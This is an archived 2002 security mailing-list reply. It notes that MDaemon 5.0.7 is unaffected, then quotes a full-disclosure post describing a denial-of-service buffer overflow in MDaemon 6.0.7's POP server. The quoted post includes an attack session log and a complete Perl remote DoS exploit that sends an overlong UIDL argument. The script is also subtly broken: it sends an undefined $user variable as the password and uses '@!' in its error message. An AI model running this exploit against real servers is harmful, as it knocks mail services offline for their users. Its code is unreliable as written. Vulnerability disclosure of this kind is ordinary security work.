Re: MDaemon SMTP/POP/IMAP server DoS

From: Karl Pietri (kpietriat_private)
Date: Tue Oct 29 2002 - 09:12:02 PST

Next message: securityat_private: "[Full-Disclosure] Security Update: [CSSA-2002-039.0] Linux: bzip2 file creation and symbolic link vulnerabilities"

Previous message: securityat_private: "Security Update: [CSSA-2002-039.0] Linux: bzip2 file creation and symbolic link vulnerabilities"
In reply to: D4rkGr3y: "MDaemon SMTP/POP/IMAP server DoS"
Next in thread: Robert Feldbauer: "RE: MDaemon SMTP/POP/IMAP server DoS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

5.0.7 not vulnerable (tested on registered pro server). tested dele and uidl
both with over 40b of 1.

-Karl Pietri
----- Original Message -----
From: "D4rkGr3y" <grey_1999at_private>
To: <bugtraqat_private>; <submissionsat_private>;
<vulnwatchat_private>
Sent: Sunday, October 27, 2002 11:49 AM
Subject: MDaemon SMTP/POP/IMAP server DoS


> ######################################################
> #Product: MDaemon SMTP/POP/IMAP server               #
> #Authors: Alt-N Technologies Ltd [www.mdaemon.com]   #
> #Vulnerable versions: v.6.0.7 and bellow             #
> #Vulnerability: buffer overflow                      #
> #Bug&exploit by D4rkGr3y [www.dhgroup.org]           #
> ######################################################
>
> #Overview#--------------------------------------------------------------#
> From MDaemon's help file:
> "MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services
> commonplace on UNIX hosts and the Internet to Windows based servers
> and microcomputers. MDaemon is designed to manage the email needs of
> any number of individual users and comes complete with a powerful set
> of integrated tools for managing mail accounts and message formats.
> MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete
> with LDAP support, an integrated browser-based email client, content
> filtering, spam blockers, extensive security features, and more."
>
> #Problem#----------------------------------------------------------------#
> Bug founded in MDaemon's pop-server. It's possible to kill MDaemon by
> sending long arguments (32b and above) with DELE or UIDL commands.
> To do this u must have at least mail-account on vulnerable host.
> After geting long request from client, all MDaemon's Services will be
> closed (smtp, imap, pop, (?)worldclient).
> Here the log of attack on local MDaemon POP-server:
>
> +OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7
<MDAEMON-F200210
> 271036.AA3656130MD0012at_private>
> USER D4rkGr3y
> +OK D4rkGr3y... Recipient ok
> PASS cool-pass
> +OK D4rkGr3yat_private's mailbox has 1 total messages (18356 octets).
> UIDL 11111111111111111111111111111111
>
> Connection to host lost...
>
> #Exploit#----------------------------------------------------------------#
>
> #!/usr/bin/perl
> #MDaemon SMTP/POP/IMAP server remote DoS exploit by D4rkGr3y
> use IO::Socket;
> $host = "[vuln_host]";
> $login = "[login]";
> $pass = "[pass]";
> $port = "110";
> $data = "1";
> $num = "32";
> $buf .= $data x $num;
> $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
Proto => "tcp", Type => SOCK_STREAM)
> or die "Couldn't connect: @!\n";
> print $socket "USER $login\n";
> print $socket "PASS $user\n";
> print $socket "UIDL $buf\n";
> close($socket);
>
> #EOF
>
> Best regards               www.dhgroup.org
>   D4rkGr3y                    icq 540981
>
>
>

Next message: securityat_private: "[Full-Disclosure] Security Update: [CSSA-2002-039.0] Linux: bzip2 file creation and symbolic link vulnerabilities"
Previous message: securityat_private: "Security Update: [CSSA-2002-039.0] Linux: bzip2 file creation and symbolic link vulnerabilities"
In reply to: D4rkGr3y: "MDaemon SMTP/POP/IMAP server DoS"
Next in thread: Robert Feldbauer: "RE: MDaemon SMTP/POP/IMAP server DoS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Oct 29 2002 - 12:32:20 PST